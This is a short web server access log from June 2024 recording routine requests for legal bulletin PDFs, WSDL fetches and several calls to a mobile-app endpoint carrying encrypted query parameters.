172.22.2.4 - - [25/Jun/2024:07:11:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [25/Jun/2024:07:13:48 -0500] "GET /BLA/resoluciones/AUTOS%202016/2313.pdf HTTP/1.1" 200 462141
207.46.13.7 - - [25/Jun/2024:07:13:52 -0500] "GET /BLA/ HTTP/1.1" 200 538
216.245.221.92 - - [25/Jun/2024:07:14:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Jun/2024:07:12:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51986
201.245.192.253 - - [25/Jun/2024:07:14:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.102.67.238 - - [25/Jun/2024:07:14:22 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX185qHeDyMQUwiT/AAf2BrsIuG+AR6tSJUsosF875jqrsIacWjPEpheH&y=U2FsdGVkX18+3zJZ3U5lAatCYuNljNTWd+rVooNNWB4= HTTP/1.1" 200 30
186.102.67.238 - - [25/Jun/2024:07:14:22 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+ZsJaVvTJ7JZUZGrMNJbItnOMj1G7UcevWnEbfetHvmcJwzCeKcwriJHLKuSea5A5Wu13/MuxU91Z5Cj1g/bC+Sl3DYl5Pwmo=&u=U2FsdGVkX1+QEcBbMgesJbKQ1iplyVYS3sDh2lBc+l8=&y=U2FsdGVkX18+3zJZ3U5lAatCYuNljNTWd+rVooNNWB4= HTTP/1.1" 200 97
186.102.67.238 - - [25/Jun/2024:07:14:23 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18vHMUnCpuQJh9+Ty7o3wQeSw+7DSUmm1JK5iYaWSw9RLto6qMsNkJwd7fpoUOWzmJ3K5iaCBq3jZHdCW3Q8RC5bFe88kyyAbcDJ05Rl7dVlMtufJZZ/yPb+V6PLdRl3yuzciF6H+Dl+16g6Fj8fua6DF/y/Ub7/mElCdS1t047czAozNq2pZorIlthwNuFKeNVaLYQFAzsBZA16ujNNHK73QDkaE66SkXPZtT63fq/mfOt8SjahHrsevwJGj0mW87EoU9xPAP+ugra0XpFQUDCXfUwPRCqr4cHE8pL9X0Py6Jwd2LudyspZdE5B3Qt2n3w7j0ppY4OvE269tND5oZgbIpSwZZFGpihMKpOHQDCFkdOEpNK8ocx/BYsaNmO3qLJ5Uj5d4I1JCK73E8RPpQAHmY2mmkplmaEo5+wO/JABNhTZahT59dfIT1jLU58dEGFyu/C97nSjvnwHP+OOA53+uPLy41rgB6A5dtTITMaGvy3xyb/unyZjKPnO6eDotrSUzUHGO0TtBnFW8V+33tsF0Y9T1zToKbvAiaji7HRRQ9vhsiWC2PpUIgSZ+e7SydvQQVzNI/xZRljnFjI30UOHUitHk9eiRlcQX2n/llzeyVtaDM3jnYM8rViLrYKOVqZ/G1U3Oy1+g1ypLEaa5hANdWM4jyZ3dFBqrJXaT1YY8NgdJb2ZGrRYARXUZBB1WaapAEhekOJhTstwkcOJv8+QvVbPAqV8ql0Welu67+dmqdKKppC3czR9mvg3Kh1TQGWwc49njsQ7YOY0pdiGAasmEdhuz5dhKT3eXZbRvytyUrVgbg9oELYYeMcGFK5Na1shd3akDvEsK/B5WLkyN44KOrwn4NMBDHCiXuOuBp+NIqtInk1RztOvgY2aO9OUNmNXafYMOuxTwg2ZfPKu68oR0pLwluMw1GwMz5Djjy2qRbMu019Lc5F6hF33bYAEhrhrm50nEisyuAr/diGJagXiP+y256dpi8P9ajdgGay3QFYIH0gDEQ4k1pLfOsKB1SQlcQWZ1lHOfJU1+tY2i01W00Ca9kNN5eLaVIfMeip/hEgd2+zAzyIGOgkq35jtX70rpZdqg3gU+E7Xu9UQY06bPbHUQGWkYpWNmDK3XhDZlbJZl/yBTCoxgGNdN/Dh2jw2VwsSGBDD+ut760FvYseKwOV0epBfuZwM8wURvYSj9EpRDNlnhE0wNUbf6j3cwrlNRAuyjPuZkz8GaVuZh3a0z78rcq0KJIMRMn95LoBzINpvdMiSL2GmeqFfxIc9Eal4y7XDPHGkiaCHMlIZVe5n6xjz22QIGMLPg886Qw/9ogAkLu3WodFewdQMx6XrnuZiyKv9P1rAj5ocn/SiKL1p6di/ljL6DzRslFn5D3mn4IWc5FgtTSvCrxaDP7nqG0UI4UHfd5/JZ3VPISf3ywv9vetha1B5zQT7p4A54xxQJ5V3k5zP4/VQuz21MsOegzm6HzbGWJb6BDo3eAxIdcIJaA+VxAUECrk5bNsLsPO3LCIUZmnPdNyhXHbuLJ+fX19/AxAH5hMlWgPCVUAz4/r8xvlKTHpA6/vZhWqzvZHwwSu/FhiAR5zcC9mAZciqWHH8A5Vsf+W/KwU7qRUobVJvrg7qOmxwmCwmD5Y3/8DNqRW5tq0l9vg6ccN6cN3B1ZFnNAO0F0zotf1Mvk7qdzeu/WS/MkzpYDFZwvlo2daXxtOmT+H/fqxoIXk3FT6nnsgCDwG91rpf5P00uP7E/xb+M7X3XiOGlg=&u=U2FsdGVkX1+QEcBbMgesJbKQ1iplyVYS3sDh2lBc+l8=&y=U2FsdGVkX18+3zJZ3U5lAatCYuNljNTWd+rVooNNWB4= HTTP/1.1" 200 525
186.102.67.238 - - [25/Jun/2024:07:14:23 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/V+YeWbYcL60rkBpPm/gLiTZWtwVrj8VgSO3nfQ4gJhUXIy1ZH52uoNYAgWk+HqSvWo/Y9JVEBFutklhS5VO2pf2HG5WogIN6h4CFktiXvCH4v1usp3TDNzFylfK+0ct2KhnjZ8wegQdqjKWOySPTF0HZD+/UFrH/IYwCE/8yYeB4GdhxLiBwo5aWc6nQwB6jNcNvz1JUN3mb2VIKSr+U96himx5KloSt+uIlk/Qbe+QFqIb2aPcBrvt6HFzeEENMppZVMBpjlM8vEZbsWoRbrOUCstI9k+gUTqMHeVjLD5hLrFw2Kg8WXAsTl3eG1eXsf8eKEVA0VSO0nVVD8yXjipzg3V5ZsLj+IuOL1TU9rJL0gnB0AAm84/3kUizbCRD+yC3Jfm3P+LGaKPOHyEI4jNgjIEAHMucf0iBQiOxjAe6ntPjlHS478mFSC7zuGaXIJnK1YIQt6FIvq8DmrLX5x1zsz27RegdDfqzM44pPc5ykKRNVX65+05SFz816IVsDfdMcQoo1/wVScItpt0n7I/sZ8UA4wwQ1NgVMqKWDyMC52A5heldsi7mHUYdqyZ7SUNA5s2qpQXhDf0attHJYBIyS1SRqarf0VjZxtGqoO4occ0egcnGJXGVZT5A97OyQZzDa7Ex0gps0zvaShJAuvN2lJ9igMVKo6VP9ZYJvYyrm2HQ8fwSPI38VEzRi2+91FAR0BnIYINnAwCbMKHuefmJKKfbtzRyJl9d1CxfSgVBO/3AO3ihhR&u=U2FsdGVkX1+QEcBbMgesJbKQ1iplyVYS3sDh2lBc+l8=&y=U2FsdGVkX18+3zJZ3U5lAatCYuNljNTWd+rVooNNWB4= HTTP/1.1" 200 208
186.102.67.238 - - [25/Jun/2024:07:14:23 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX185qHeDyMQUwiT/AAf2BrsIuG+AR6tSJUsosF875jqrsIacWjPEpheH HTTP/1.1" 200 30244
216.244.66.195 - - [25/Jun/2024:07:14:26 -0500] "GET /BLA/resoluciones/AUTOS%202016/2592.pdf HTTP/1.1" 200 422797
216.244.66.195 - - [25/Jun/2024:07:15:00 -0500] "GET /BLA/resoluciones/AUTOS%202016/2593.pdf HTTP/1.1" 200 435883
201.245.192.253 - - [25/Jun/2024:07:15:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:07:15:36 -0500] "GET /BLA/boletinlegal/Directivas/2022/DIRECTIVA%20No.%2000002%20DEL%2022%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 304 -
